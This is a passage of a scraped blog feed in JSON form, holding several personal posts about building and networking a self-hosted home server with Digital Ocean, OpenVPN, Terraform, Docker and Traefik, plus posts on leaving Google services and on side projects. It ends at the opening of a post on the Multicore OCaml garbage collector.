customer for a long time.\nPublic Static IP\nIn order to host content, you need a stable public IP. Unfortunately, ACT puts all of its customers in Bangalore behind a NAT 2. As a result, I decided to get a Floating IP from Digital Ocean 3.\nThe Static IP is attached to a cheap Digital Ocean Droplet (10$\u002Fmo). If you resolve bb8.fun, this is the IP you will get:\n\nName:   bb8.fun\nAddress: 139.59.48.222\n\n\nThe droplet has a public static IP of its own as well: 139.59.22.234. The reason I picked a Floating IP is that DO gives them out for free, and I can switch between instances later without worrying about it.\nFloating IP\nOn the Digital Ocean infrastructure side, this IP is not directly attached to an interface on your droplet. Instead, DO uses something called an “Anchor IP”:\nNetwork traffic between a Floating IP and a Droplet flows through an anchor IP, which is an IP address aliased to the Droplet’s public network interface (eth0). You should bind any public services that you want to make highly available through a Floating IP to the anchor IP.\nSo, now my Droplet has 2 different IPs that I can use:\nDroplet Public IP (139.59.22.234), assigned directly to the eth0 interface.\nDroplet Anchor IP (10.47.0.5), set up as an alias to the eth0 interface.\nThis doubles the number of services I can listen on. I could have (for eg) 2 different webservers on these two IPs.\nOpenVPN\nIn order to establish NAT-punching connectivity between the Droplet and the Home Server, I run an OpenVPN server on the Droplet and openvpn-client on the homeserver.4\nThe Digital Ocean Guide is a great resource if you ever have to do this. 2 specific IPs on the OpenVPN network are marked as static:\nDroplet: 10.8.0.1\nHome Server: 10.8.0.14\nHome Server - Networking\nThe server has a private static IP assigned to its eth0 interface.\nIt also has a private static IP assigned to its tun0 interface.\nThere are primarily 3 kinds of services that I like to run:\nAccessible only from within the home network (Timemachine backups, for eg) (Internal). These I publish on the eth0 interface.\nAccessible only from the public internet (Wiki) (Strictly Public). These I publish on the tun0 interface and proxy via the droplet.\nAccessible from both places (Emby, AirSonic) (Public).
These I publish on both the tun0 and eth0 interfaces on the homeserver.\nDocker Networking Basics\nDocker runs its own internal network for services, and lets you “publish” these services by forwarding traffic from a given interface to them.\nIn plain docker-cli, this would be:\ndocker run --publish 443:443 --publish 80:80 nginx (forward traffic on ports 443 and 80 on all interfaces to the container)\nSince I use Terraform, it looks like the following for Traefik:\n\n# Admin Backend\nports {\n  internal = 1111\n  external = 1111\n  ip       = \"${var.ips[\"eth0\"]}\"\n}\n\nports {\n  internal = 1111\n  external = 1111\n  ip       = \"${var.ips[\"tun0\"]}\"\n}\n\n# Local Web Server\nports {\n  internal = 80\n  external = 80\n  ip       = \"${var.ips[\"eth0\"]}\"\n}\n\n# Local Web Server (HTTPS)\nports {\n  internal = 443\n  external = 443\n  ip       = \"${var.ips[\"eth0\"]}\"\n}\n\n# Proxied via sydney.captnemo.in\nports {\n  internal = 443\n  external = 443\n  ip       = \"${var.ips[\"tun0\"]}\"\n}\n\nports {\n  internal = 80\n  external = 80\n  ip       = \"${var.ips[\"tun0\"]}\"\n}\n\n\nThere are 3 “services” exposed by Traefik on 3 ports:\nTraefik Admin Interface\n  Useful for debugging. I leave this in Read-Only mode with no authentication. This is an Internal service.\n  HTTP, Port 80\n  This redirects users to the next entrypoint (HTTPS). This is a Public service.\n  HTTPS, Port 443\n  This is where most of the traffic flows. This is a Public service.\n\n\nFor all 3 of the above, Docker forwards traffic from both OpenVPN as well as the home network. OpenVPN lets me access these services from my laptop when I’m not at home, which is helpful for debugging issues. However, to keep the Admin Interface internal, it is not published to the internet.\nInternet Access\nThe “bridge” between the Floating IP and the OpenVPN IP (both on the Digital Ocean droplet) is simpleproxy. It is a barely-maintained 200-line TCP proxy. I picked it because of its ease of use as a TCP proxy. I specifically looked for a TCP proxy because:\nI did not want to terminate SSL on Digital Ocean, since Traefik was already doing LetsEncrypt cert management for me\nI also wanted to proxy non-web services (more below).\nThe simpleproxy configuration consists of a few systemd units:\n\n[Unit]\nDescription=Simple Proxy\nAfter=network.target\n\n[Service]\nType=simple\nWorkingDirectory=\u002Ftmp\n# Forward Anchor IP 80 -> Home Server VPN 80\nExecStart=\u002Fusr\u002Fbin\u002Fsimpleproxy -L 10.47.0.5:80 -R 10.8.0.14:80\nRestart=on-abort\n\n[Install]\nWantedBy=multi-user.target\n\n\nI run 3 of these: 2 for HTTP\u002FHTTPS, and another one for SSH.\nWhile I use simpleproxy for its stability and simplicity, you could also use iptables to achieve the same result.
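For illustration, here is a minimal sketch of what a TCP forwarder like simpleproxy does, written with Python’s asyncio. This is my own illustration using the post’s addressing (anchor IP 10.47.0.5 forwarding to the home server’s VPN IP 10.8.0.14), not the actual simpleproxy code:\nimport asyncio\n\nLISTEN = ('10.47.0.5', 80)   # anchor IP on the droplet\nREMOTE = ('10.8.0.14', 80)   # home server, over the OpenVPN tunnel\n\nasync def pump(reader, writer):\n    # copy bytes one way until EOF, then close the write side\n    try:\n        while True:\n            data = await reader.read(65536)\n            if not data:\n                break\n            writer.write(data)\n            await writer.drain()\n    finally:\n        writer.close()\n\nasync def handle(client_reader, client_writer):\n    remote_reader, remote_writer = await asyncio.open_connection(*REMOTE)\n    # pump both directions concurrently until either side disconnects\n    await asyncio.gather(pump(client_reader, remote_writer),\n                         pump(remote_reader, client_writer))\n\nasync def main():\n    server = await asyncio.start_server(handle, *LISTEN)\n    async with server:\n        await server.serve_forever()\n\nasyncio.run(main())\nBecause such a proxy is a plain byte pipe, the original client address is lost along the way; that is exactly the Proxy Protocol caveat mentioned under Caveats below.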
SSH Tunnelling\nWhen I’m on the go, there are 3 different SSH services I might need:\nDigital Ocean Droplet\nHome Server\nGit (gitea runs its own internal git server)\nMy initial plan was:\nForward Port 22 Floating IP traffic to Gitea.\nUse the eth0 interface on the droplet to run the droplet sshd service.\nKeep the Home Server SSH forwarded to OpenVPN, so I can access it over the VPN network.\nUnfortunately, that didn’t work out well, because sshd doesn’t support listening on an interface. I could have used the Public Droplet IP, but I didn’t like the idea.\nThe current setup instead involves:\nRunning the droplet sshd on a separate port entirely (2222).\nThe simpleproxy service forwarding port 22 traffic to port 2222 on the OpenVPN IP, which is then published by Docker to the gitea container’s port 22.\nThe complete traefik configuration is also available if you wanna look at the entrypoints in detail.\nCaveats\nTraefik Public Access\nYou might have noticed that because traefik is listening on both eth0 and tun0, there is no guarantee of a “strictly internal” service via Traefik. Traefik just uses the Host header in the request (or SNI) to determine the container to which it needs to forward the request. I use *.in.bb8.fun for internally accessible services, and *.bb8.fun for public ones. But if someone decides to spoof the headers, they can access the Internal services.\nSince I’m aware of the risk, I do not publish anything via traefik that I’m not comfortable putting on the internet. Only a couple of services are marked as “internal-also”, and are published on both. Services like Prometheus are not published via Traefik.\n2 Servers\nRunning and managing 2 servers takes a bit more effort, and has more moving parts. But I use the droplet for other tasks as well (running my DNSCrypt server, for eg).\nOriginal IP Address\nSince simpleproxy does not support the Proxy Protocol, neither Traefik nor the Gitea\u002FSSH servers get informed about the original IP address. I plan to fix that by switching to HAProxy in TCP mode.\nIf you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:\nPart 1, Hardware\nPart 2, Terraform\u002FDocker\nPart 3, Learnings\nPart 4, Migrating from Google (and more)\nPart 5, Home Server Networking\nPart 6, btrfs RAID device replacement\nIf you have any comments, reach out to me\nIf you get lucky with their customer support, some of the folks I know have a static public IP on their home setup. In my case, they asked me to upgrade to a corporate plan. ↩\nI once scanned their entire network using masscan. It was fun: https:\u002F\u002Fmedium.com\u002F@captn3m0\u002Fi-scanned-all-of-act-bangalore-customers-and-the-results-arent-surprising-fecf9d7fe775 ↩\nAWS calls its “permanent” IP addresses “Elastic” and Digital Ocean calls them “Floating”. We really need better names in this industry. ↩\nMigrating to Wireguard is on my list, but I haven’t found any good documentation on running a hub-spoke network so far.
↩",[],{"slug":2557,"title":2495,"link":2558,"pubDate":2559,"contentSnippet":2560,"tags":2561,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"tld-a-records-1","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2018\u002F02\u002F09\u002Ftld-a-records\u002F","2018-02-09T00:00:00.000Z","Re-ran the same scan as http:\u002F\u002Fblog.towo.eu\u002Fa-records-on-top-level-domains\u002F\nScan run from AS9498.\nResults:\nTLD | IP\nai | 209.59.119.34\nandroid | 127.0.53.53\narab | 127.0.53.53\ncal | 127.0.53.53\nchrome | 127.0.53.53\ncm | 195.24.205.60\ndclk | 127.0.53.53\ndk | 193.163.102.58\ndrive | 127.0.53.53\netisalat | 127.0.53.53\ngg | 87.117.196.80\ngle | 127.0.53.53\nguge | 127.0.53.53\nhangout | 127.0.53.53\nje | 87.117.196.80\nnexus | 127.0.53.53\npa | 168.77.8.43\nplay | 127.0.53.53\npn | 80.68.93.100\npolitie | 127.0.53.53\nsport | 127.0.53.53\ntk | 217.119.57.22\nuz | 91.212.89.8\nws | 64.70.19.33\n谷歌 | 127.0.53.53\nмон | 218.100.84.27\nмон | 202.170.80.40\nмон | 180.149.98.78\nاتصالات | 127.0.53.53\n政府 | 127.0.53.53\nعرب | 127.0.53.53\n招聘 | 127.0.53.53\nグーグル | 127.0.53.53\nUpdate: An automatically updated version of this is available at https:\u002F\u002Fcaptnemo.in\u002Ftld-a-record\u002F",[],{"slug":2563,"title":2564,"link":2565,"pubDate":2566,"contentSnippet":2567,"tags":2568,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"migrating-from-google","Migrating from Google (and more)","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F12\u002F31\u002Fmigrating-from-google\u002F","2017-12-31T00:00:00.000Z","Contents\nEmail\nGoogle Play Music\nGoogle Keep\nPhone\n      \nmicroG Core\nUnifiedLP\nMaps\nUber\nCalendar\u002FContacts\nGoogle Play Store\nLastPass\nGitHub\nAs part of working on my home-server setup, I wanted to move off a few online services to ones that I manage myself. This is a list of the services I used and what I’ve migrated to.\nWhy: I got frustrated with Google Play Music a few times. Synced songs would not show up across all clients immediately (I had to refresh, uninstall, reinstall), and I hated the client limits it would impose. Decided to try microG on my phone at the same time, and it slowly came together.\nEmail\nI’ve been using email on my own domain for quite some time (captnemo.in), but it was managed by an Outlook+Google combination that I didn’t like very much.\nI switched to Migadu sometime last year, and have been quite happy with the service. Their Privacy Policy and the pros\u002Fcons section on their website are a pleasure to read.\nWhy: Email is the central point of your online digital identity. Use your own domain, at the very least. That way, you’re at least protected if Google decides to suspend your account. Self-hosting email is a big responsibility that requires critical uptime, and I didn’t want to manage that, so I went with Migadu.\nWhy Migadu: You should read their HN thread.\nCaveats: They don’t yet offer 2FA, but hopefully that should be fixed soon. Their spam filters aren’t the best either.
Migadu even has a Drawbacks section on their website that you must read before signing up.\nAlternatives: RiseUp, FastMail.\nGoogle Play Music\nI quite liked Google Play Music. While their subscription offering is horrible in India, I was a happy user of their “bring-your-own-music” plan. In fact, the most used Google service on my phone happened to be Google Play Music! I switched to a nice subsonic fork called AirSonic, which gives me the ability to:\nListen on as many devices as I want (Google has some limits)\nListen using multiple clients at the same time\nStream at whatever bandwidth I pick (I stream at 64kbps over 2G networks!)\nI’m currently using Clementine on the Desktop (which unfortunately doesn’t cache music), and UltraSonic on the phone. Airsonic even supports bookmarks, so listening to audiobooks becomes much simpler.\nWhy: I didn’t like Google Play Music’s limits, plus I wanted to try the “phone-without-google” experiment.\nWhy AirSonic: Subsonic is now closed source, and the Libresonic developers forked off to AirSonic, which is under active development. It is supported across all devices that I use, while Ampache has spotty Android support.\nGoogle Keep\nI switched across to WorkFlowy, which has both an Android and a Linux app (both based on webviews). I’ve used it for years, and it is a great tool. Moreover, I’m also using DAVDroid sync for the Open Tasks app on my phone. Both of these work well enough offline.\nWhy: I didn’t use Keep much, and WorkFlowy is a far better tool anyway.\nWhy WorkFlowy: It is the best note-taking\u002Flist tool I’ve used.\nPhone\nI switched over to the microG fork of lineageOS, which offers a reverse-engineered implementation of the Google Play Services modules. It includes:\nmicroG Core\nWhich talks to Google for Sync and Account purposes.\nWhy: Saves me a lot of battery. I can uninstall this, unlike Google Play Services.\nCons: Not all Google services are supported very well. Push notifications have some issues on my phone. See the Wiki for Implementation Status.\nUnifiedLP\nInstead of the Google Location Provider, I use the Mozilla Location Services, along with Mozilla Stumbler to help improve their data.\nWhy: Google doesn’t need to know where I am.\nCaveats: GALP (Google Assisted Location Provider) does GPS locks much faster in comparison. However, I’ve found the Mozilla Location Services coverage in Bangalore to be pretty good.\nMaps\nStill looking for decent alternatives.\nUber\nmicroG comes with a Google Maps shim that talks to Open Street Maps. The maps feature on Uber worked fine with that shim; however, booking cabs was not always possible. I switched over to m.uber.com, which worked quite well for some time.\nUber doesn’t really spend resources on their mobile site though, and it would occasionally stop working, especially with regards to payments. I’ve switched over to the Ola mobile website, which works pretty well. I keep the OlaMoney app for recharging the OlaMoney wallet alongside.\nThe Uber->Ola switch was also partially motivated by how badly run Uber is.\nCalendar\u002FContacts\nMost implementations support caldav\u002Fcarddav for calendar\u002Fcontacts sync. I’m using DAVDroid for syncing to a self-hosted Radicale Server.\nWhy: I’ve always had contacts synced to Google, so it was always my single source of truth for contacts. But since I’m on a different email provider now, it makes sense to move off those contacts as well.
Radicale also lets me manage multiple addressbooks very easily.\nWhy Radicale: I looked around at alternatives, and 2 looked promising: Sabre.io and Radicale. Sabre is no longer under development, so I picked Radicale, which also happened to have a regularly updated docker image.\nGoogle Play Store\nSwitch to FDroid - it has some apps that Google doesn’t like, and some more. Moreover, you can use YALP Store to download any application from the Play Store. You can even run an FDroid repository for the apps you use from the Play Store, as an alternative. See this excellent guide on the various options.\nWhy: Play Store is tightly linked to Google Play Services, and doesn’t play nice with microG.\nWhy FDroid: FDroid has publicly verifiable builds, and tons of open-source applications.\nWhy Yalp: Was easy enough to set up.\nIf you’re looking to migrate to microG, I’d recommend going through the entire NO Gapps Setup Guide by shadow53 before proceeding.\nLastPass\nI’ve switched to pass, along with a sync to keybase.\nWhy: LastPass has had multiple breaches, and a plethora of security issues (including 2 RCE vulnerabilities). Their fingerprint authentication on Android could be bypassed till recently. I just can’t trust them any more.\nWhy pass: It is built on strong crypto primitives, is open-source, and has good integration with both i3 and firefox. There is also a LastPass migration script that I used.\nCaveats: Website names are used as filenames in pass, so even though passwords are encrypted, you don’t want to push it to a public Git server (since that would expose the list of services you are using). I’m using my own git server, along with keybase git (which keeps it end-to-end encrypted, even branch names). You also need to be careful about your GPG keys, instead of a single master password.\nGitHub\nFor bonus, I set up a Gitea server hosted at git.captnemo.in. Gitea is a fork of gogs, and is a single-binary go application that you can run easily.\nJust running it for fun, since I’m pretty happy with my GitHub setup. However, I might move some of my sensitive repos (such as this) to my own host.\nWhy Gitea: The other alternatives were gogs and GitLab. There have been concerns about gogs’ development model, and GitLab was just too overpowered\u002Fheavy for my use case. (I’m using the home server for gaming as well, so it matters.)\nIf you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:\nPart 1, Hardware\nPart 2, Terraform\u002FDocker\nPart 3, Learnings\nPart 4, Migrating from Google (and more)\nPart 5, Home Server Networking\nPart 6, btrfs RAID device replacement\nIf you have any comments, reach out to me",[],{"slug":2570,"title":2571,"link":2572,"pubDate":2573,"contentSnippet":2574,"tags":2575,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"home-server-learnings","Learnings from building my own home server","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F12\u002F18\u002Fhome-server-learnings\u002F","2017-12-18T00:00:00.000Z","Learnings\nI forgot to do this in the last blog post, so here is the list:\narchlinux has official packages for intel-microcode-updates.\nwireguard is almost there.
I’m running openvpn for now, waiting for the stable release.\nWhile traefik is great, I’m concerned about the security model it has for connecting to Docker (it uses the docker unix socket over a docker mounted volume, which gives it root access on the host). Scary stuff.\nDocker Labels are a great signalling mechanism. Update: After seeing multiple bugs in how traefik uses docker labels, I’d say they have limited use-cases, but they work great in those. Don’t try to over-architect them for all your metadata.\nTerraform still needs a lot of work on their docker provider. A lot of updates destroy containers when they should be applied in place, without needing a destroy.\nI can’t proxy gitea’s SSH authentication easily, since traefik doesn’t support TCP proxying yet.\nThe docker_volume resource in terraform is useless, since it doesn’t give you any control over the volume location on the host. (This might be a docker limitation.)\nThe upload block inside a docker_container resource is a great idea. It lets you push configuration straight inside a container. This is how I push configuration straight inside the traefik container, for eg:\n    \n\nupload {\n  content = \"${file(\"${path.module}\u002Fconf\u002Ftraefik.toml\")}\"\n  file    = \"\u002Fetc\u002Ftraefik\u002Ftraefik.toml\"\n}\n\n    \nAdvice\nThis section is for you if you’re venturing into a docker-heavy terraform setup:\nUse traefik. It will save you a lot of pain with proxying requests.\nRepeat the ports section for every IP you want to listen on. CIDRs don’t work.\nIf you want to run the container on boot, you want the following:\n    \n\n restart = \"unless-stopped\"\n destroy_grace_seconds = 10\n must_run = true\n\n    \nIf you have a single docker_registry_image resource in your state, you can’t run terraform without internet access.\nBreaking your docker module into images.tf, volumes.tf, and data.tf (for registry_images) works quite well.\nMemory limits on docker containers can be too constrained. Keep an eye on logs to see if anything is getting killed.\nSet up Docker TLS auth first. I tried proxying Docker over apache with basic auth, but it didn’t work out well.\nMongoDB with forceful server restarts\nSince my server gets a forceful restart every few days due to power cuts (I’m still working on a backup power supply), I faced some issues with MongoDB being unable to recover cleanly. The lockfile would indicate an ungraceful shutdown, and it would require manual repairs, which sometimes failed.\nAs a weird-hacky-fix, since most of the errors were from the MongoDB WiredTiger engine itself, I hypothesized that switching to a more robust engine might save me from these manual repairs. I switched to MongoRocks, and while it has stopped the issue with repairs, the wiki still doesn’t like it, and I’m facing this issue: https:\u002F\u002Fgithub.com\u002FRequarks\u002Fwiki\u002Fissues\u002F313\nHowever, I don’t have to repair the DB manually, which is a win.\nSSHD on a specific interface\nMy proxy server has the following:\n\neth0 139.59.22.234\n\n\nAnd an associated Anchor IP for static IP use cases via Digital Ocean (10.47.0.5, doesn’t show up in ifconfig).\nI wanted to run the following setup:\neth0:22 -> sshd\nAnchor-IP:22 -> simpleproxy -> gitea:ssh\nwhere gitea is the git server hosting git.captnemo.in.
This way:\nI could SSH to the proxy server over 22\nAnd directly SSH to the Gitea server over 22, using a different IP address.\nUnfortunately, sshd doesn’t allow you to listen on a specific interface, and since the eth0 IP is non-static, I can’t rely on it.\nAs a result, I’ve resorted to just using 2 separate ports:\n22 -> simpleproxy -> gitea:ssh\n222 -> sshd\nThere are some hacky ways around this by creating a new service that boots SSHD after network connectivity, but I thought this was much more stable.\nWiki.js public pages\nI’m using wiki.js, set up at https:\u002F\u002Fwiki.bb8.fun. A specific requirement I had was public pages, so that I could give people links to specific resources that could be browsed without a login.\nHowever, I wanted the default to be authenticated, and only certain pages to be public. The config for this was surprisingly simple:\nYAML config\nYou need to ensure that defaultReadAccess is false:\n\nauth:\n  defaultReadAccess: false\n  local:\n    enabled: true\n\n\nGuest Access\nThe following configuration is set for the guest user (shown as a screenshot in the original post, not reproduced here):\nNow any pages created under the \u002Fpublic directory are browseable by anyone.\nHere is a sample page: https:\u002F\u002Fwiki.bb8.fun\u002Fpublic\u002Fnebula\nDocker CA Cert Authentication\nI wrote a script that goes with the docker TLS guide to help you set up TLS authentication (embedded as a gist in the original post).\nOpenVPN default gateway client side configuration\nI’m running an OpenVPN configuration on my proxy server. However, I don’t always want to use my VPN as the default route, only when I’m on an untrusted network. I still, however, want to be able to connect to the VPN and use it to connect to other clients.\nThe solution is two-fold:\nServer Side\nMake sure you do not have the following in your OpenVPN server.conf:\npush \"redirect-gateway def1 bypass-dhcp\"\nClient Side\nI created 2 copies of the VPN configuration files. Both of them have identical config, except for this one line:\nredirect-gateway def1\nIf I connect to the VPN using this configuration, all my traffic is forwarded over the VPN. If you’re using Arch Linux, this is as simple as creating 2 config files:\n\u002Fetc\u002Fopenvpn\u002Fclient\u002Fone.conf\n\u002Fetc\u002Fopenvpn\u002Fclient\u002Ftwo.conf\nAnd running systemctl start openvpn-client@one. I’ve enabled my non-default-route VPN service, so it automatically connects on boot.\nIf you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:\nPart 1, Hardware\nPart 2, Terraform\u002FDocker\nPart 3, Learnings\nPart 4, Migrating from Google (and more)\nPart 5, Home Server Networking\nPart 6, btrfs RAID device replacement\nIf you have any comments, reach out to me",[],{"slug":2577,"title":2578,"link":2579,"pubDate":2580,"contentSnippet":2581,"tags":2582,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"home-server-update","Running terraform and docker on my home server","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F11\u002F09\u002Fhome-server-update\u002F","2017-11-09T00:00:00.000Z","The last time I’d posted about my Home Server build in September, I’d just gotten it working. Since then, I’ve made a lot of progress. It is now running almost 10 services, up from just Kodi back then.
Now it has a working copy of:\nKodi\n  I was running kodi-standalone-service, set to run on boot, as per the ArchLinux Wiki, but switched to a simple autorun under openbox.\n  Steam\n  The current setup uses Steam as the application launcher. This lets me ensure that the Steam Controller works across all applications.\n  Openbox\n  Instead of running Kodi on xinit, I’m now running openbox with autologin against a non-privileged user.\n  PulseAudio\n  I tried fighting it, but it was slightly easier to configure compared to dmix. Might move to dmix if I get time.\n  btrfs\n  I now have the following disks:\n    \n128GB root volume. (Samsung EVO-850)\n1TB volume for data backups\n3TB RAID0 configuration across 2 disks.\nThere are some btrfs subvolumes in the 3TB raid setup, including one specifically for docker volumes. The docker guide recommends running btrfs subvolumes on the block device, which I didn’t like, so I’m running docker volumes in normal mode on a btrfs disk. I don’t have enough writes to care much yet, but might explore this further.\nDocker\n  This has been an interesting experiment. Kodi is still installed natively, but I’ve been trying to run almost everything else as a docker container. I’ve managed to do the configuration entirely via terraform, which has been a great learning experience. I’ve found terraform much saner as a configuration system compared to something like ansible, which gets quite crazy. (We have a much crazier terraform config at work, though.)\n  Terraform\n  I have a private repository on GitLab called nebula which I use as the source of truth for the configuration. It doesn’t hold everything yet, just the following:\n    \nDocker Configuration (not the docker service, just the containers\u002Fvolumes)\nCloudFlare - I’m using bb8.fun as the root domain, which is entirely managed using the CloudFlare terraform provider.\nMySQL - Running a MariaDB container, which has been configured by hand till this PR gets merged.\nGitea\n  Running as a docker container, provisioned using terraform. Plan to proxy this using git.captnemo.in.\n  Emby\n  Docker Container. Nothing special. Plan to set this up as the Kodi backend.\n  Couchpotato\n  Experimental setup for now. Inside a docker container.\n  Flexget\n  I wish I knew how to configure this. Also inside docker.\n  traefik\n  Running as a simple reverse proxy for most of the above services.\n  elibsrv\n  A simple OPDS server, which I use with my Kindle. If you don’t know what OPDS is, you should check this out. Running on a simple apache setup on the archlinux box for now. WIP for dockerization.\n  ubooquity\n  Simple ebook server. Proxied over the internet. Has an online ebook reader, which is pretty cool.\n  MariaDB\n  I set this up planning to shift Kodi’s data to it, but now that I have emby set up - I’m not so sure. Still, keeping this running for now.\n  Transmission\n  Hooked up to couchpotato, flexget, and sickrage so it can do things.\n  Sickrage\n  Liking this more than flexget so far, much easier to configure and use.\n  AirSonic\n  This is the latest fork of libresonic, which was itself forked off subsonic.
My attempt at getting off Google Play Music.\n\n\nLearnings\nMoved these to a separate blog post.\nTODO\nA few things off my TODO list:\nCreate a Docker image for elibsrv that comes with both ebook-convert and kindlegen pre-installed\nDo the same for ubooquity as well (using the linuxserver\u002Fubooquity docker image)\nIf you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:\nPart 1, Hardware\nPart 2, Terraform\u002FDocker\nPart 3, Learnings\nPart 4, Migrating from Google (and more)\nPart 5, Home Server Networking\nPart 6, btrfs RAID device replacement\nIf you have any comments, reach out to me",[],{"slug":2584,"title":2585,"link":2586,"pubDate":2587,"contentSnippet":2588,"tags":2589,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"home-server-build","Home Server Build","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F09\u002F17\u002Fhome-server-build\u002F","2017-09-17T00:00:00.000Z","I’d been planning to run my own home server for a while, and this culminated in a mini-ITX build recently. The current build configuration is available at \u002Fsetup\u002Fhomeserver\u002F.\nIn no particular order, here were the constraints:\nThe case should be small (I preferred the Elite 110, but it was unavailable in India).\nDual LAN, if possible (decided against it in the end). The plan was to run the entire home network from this directly, by plugging the ISP into the server.\nRecent i3\u002Fi5 for amd64 builds.\nEnough SATA bays in the cabinet for storage.\nThe plans for the server:\nScheduled backups from other sources (Android\u002FLaptop)\nRun Kodi (or perhaps switch to Emby)\nRun torrents. Transmission-daemon works. Preferably something pluggable that works with RSS.\nDo amd64 builds. See https:\u002F\u002Fgithub.com\u002Fcaptn3m0\u002Fideas#arch-linux-package-build-system\nHost a webserver. This is primarily for serving resources off the internet\n    \nHost some other minor web-services\nA simple wiki\nCaldav server\nOther personal projects\nSync Server setup. Mainly for the Kindle and the phone.\nCalibre-server, koreader sync server for the Kindle\n    \nNow looking at libreread as well\nTiny k8s cluster for running other webapps\nRun a graylog server for sending other system log data (using papertrail now, which has a 200MB limit)\nNo plans to move mail hosting. That will stay at migadu.com for now.\nI had a lot of spare HDDs that I was going to re-use for this build:\nWD MyBook 3TB (external, shelled).\nSeagate Expansion 1TB\nSeagate Expansion 3TB (external, shelled)\nSamsung EVO 128GB SSD\nThe 2x3TB disks are set up with RAID1 over btrfs. Important data is snapshotted to the other 1TB disk using btrfs snapshots and subvolumes. In total, this gives me ~4TB of storage.\nSoftware\nCurrently running kodi-standalone-service on boot. Have to decide on an easy-to-use container orchestration platform. Choices as of now are:\nRancher\nDocker Swarm\nShipyard\nTerraform\nPortainer\nMost of these are tuned for multi-host setups, and bring in a lot of complexity as a result. Looking at Portainer, which seems well suited to a single-host setup.\nOther services I’m currently running:\nelibsrv.
Running a patched build with support for ebook-convert.\nubooquity, for online reading of comics.\n\nIf you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:\nPart 1, Hardware\nPart 2, Terraform\u002FDocker\nPart 3, Learnings\nPart 4, Migrating from Google (and more)\nPart 5, Home Server Networking\nPart 6, btrfs RAID device replacement\nIf you have any comments, reach out to me",[],{"slug":2591,"title":2592,"link":2593,"pubDate":2594,"contentSnippet":2595,"tags":2596,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"project-updates","Project Updates","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F09\u002F16\u002Fproject-updates\u002F","2017-09-16T00:00:00.000Z","Over the last couple of years, I’ve been involved with lots of side projects, both online and offline. Some of them I’ve written about on the blog, like my music visualizer project. A few of them got their own project page, like the website for my niece (but no blog post), while some didn’t even get a mention. I thought I’d write about the many, many side projects I’ve started (and abandoned). You might also want to visit the \u002Fprojects page for the larger projects.\nHome Server Build\n  Sep 2017 Built a home server, mostly as a HTPC, but also as a learning exercise for managing services over Docker.\n  Sushi Go\n  Summer 2017 This is a work-in-progress conversion of Sushi Go (original), the popular card game by Gamewright, into Ruby.\n  youtube-ripper\n  June 2017 Downloads music compilations from YouTube and rips them into multiple tagged MP3 files.\n  cosmere-books\n  September 2017 Wrote an EPUB generator for multiple books in the Cosmere. Currently covers 4 different serializations at Tor.com. Also created a project page on all of my ebooks projects at \u002Febooks\u002F\n  ideas\n  Ongoing I maintain a CC0-licensed list of personal ideas. Feel free to use.\n  spectrumyzer\n  May 2017 Created an animated wallpaper using spectrumyzer. Wrote a blog post about it.\n  google-sre\n  Feb\u002FSep 2017 EPUB generator for the Google SRE ebook. Started in February in Python. Gave up and redid it properly in September.\n  CodeChef Offline\n  March 2012 I attempted to make an offline repository for CodeChef problems. I spent some time in May 2017 upgrading the project with a cleaner scraper and a Jekyll base.\n  Hoshruba\n  June 2015 I wrote a script that scraped Tor’s serialized publication of the first book in the Hoshruba series to generate EPUB and MOBI files. I would recommend the book if you are interested in reading what many would term the “original fantasy book”.\n  HackerTray\n  December 2013 I wrote a Linux PyGTK application that sits in your taskbar using Indicator Applet to show you the latest stories from Hacker News. Looking for a maintainer.\n  MagicMuggle\n  May 2017 I wrote a script to convert Magic Muggle (a Harry Potter fanfic about a muggle who accidentally gets into Hogwarts) from its original reddit posts to EPUB and MOBI files.\n  Kerala IT Policy\n  March 2017 Attempted to transcribe the draft IT policies put up by the Government of Kerala. Lots of OCR followed by manual fixes. I stopped working on this when I realized that the government had actually put up a really nice website for this (with clear plaintext, not the bad PDF I was using as the source).\n  lightsaber\n  August 2015 I created a DNS-based HTTP-3xx redirect service.
Useful if you own a domain and you want it to be redirected, but don’t have a webserver with you. Made in Ruby, as part of the Django Hackathon organized by HackerEarth.\n  HackerCouch\n  November 2015 My hack during hackbeach 2015. Created something best described as “couchsurfing for hackers”. Simple Jekyll\u002FRuby website hosted on GitHub Pages.",[],{"slug":2598,"title":2599,"link":2600,"pubDate":2601,"contentSnippet":2602,"tags":2603,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"multicore-ocaml-gc","A deep dive into Multicore OCaml garbage collector","https:\u002F\u002Fkcsrk.info\u002Fmulticore\u002Fgc\u002F2017\u002F07\u002F06\u002Fmulticore-ocaml-gc\u002F","2017-07-06T01:36:00.000Z","I recently gave a talk on the internals of the multicore OCaml GC at Jane Street’s offices in NYC. The slides from the talk are available online. But I felt that the slides alone aren’t particularly edifying. This post is basically the slides from the talk, annotated with notes.\nAbstract\nIn a mostly functional language like OCaml, it is desirable to have each domain (our unit of parallelism) collect its own local garbage independently. Given that OCaml is commonly used for writing latency-sensitive code such as trading systems, UIs, and networked unikernels, it is also desirable to minimise the stop-the-world phases in the GC. Although obvious, the difficulty is to make this work in the presence of mutations and concurrency. In this talk, I will present the overall design of the Multicore OCaml GC, but also deep dive into a few of the interesting techniques that make it 